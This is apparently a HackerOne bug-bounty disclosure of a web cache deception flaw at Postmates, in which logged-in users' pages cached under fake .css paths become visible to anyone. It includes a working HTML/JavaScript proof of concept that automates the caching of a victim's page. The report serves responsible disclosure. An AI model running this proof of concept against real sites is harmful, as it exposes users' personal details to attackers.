Postmates: Web cache poisoning attack leads to user information and more

2019-02-08T11:03:50
ID H1:492841
Type hackerone
Reporter davidalbert
Modified 2019-02-26T12:37:33

Description

Hello, Your Web-Server is vulnerable to web cache poisoning attacks. This means, that the attacker are able to get another user informations.

If you are logged in and visit this website (For example): https://postmates.com/SomeRandomText.css

Then the server will store the information in the cache, BUT with the logged in user information :) A non-logged-in user can then visit this website and see the information contained therein. In that case, this url: https://postmates.com/SomeRandomText.css

I have written a small javascript / html code, which executes this attack fully automated, you just need to visit the website and wait like 3 seconds.

Here is the small PoC code

``` <html> <head> </head> <body> <script> var cachedUrl = 'https://postmates.com/' + generateId() + '.css'; const popup = window.open(cachedUrl);

function generateId() {
    var content = '';
    const alphaWithNumber = 'QWERTZUIOPASDFGHJUKLYXCVBNM1234567890';

    for (var i = 0; i &lt; 10; i++) {
        content += alphaWithNumber.charAt(Math.floor(Math.random() * alphaWithNumber.length))
    }
    return content;
}

var checker = setInterval(function() {
    if (popup.closed) {
        clearInterval(checker);
    }
}, 200);
var closer = setInterval(function() {
    popup.close();
    document.body.innerHTML = 'Victims content is now cached &lt;a href="' + cachedUrl + '"&gt;here and the url can be saved on the hackers server&lt;/a&gt;&lt;br&gt;&lt;b&gt;Full Url: ' + cachedUrl + '&lt;/b&gt;'; 
    clearInterval(closer);
}, 3000);

</script> </body> </html> ```

Theoretically, the attacker could then store this information on his server, but in this example, the URL is simply shown. I would suggest keeping an eye on caching for more security and hope you enjoyed my report.

Some informations about the attack: https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack.pdf

The screenshots with the steps are in the attachments

Not important for this report, but i want to look deeper in your website: Can you create an account for me? Im from Germany and dont have american phone number :)

Impact

Web cache poisoning attack can be used to steal user informations like lastname and member id which is important for the login security feature. (For example)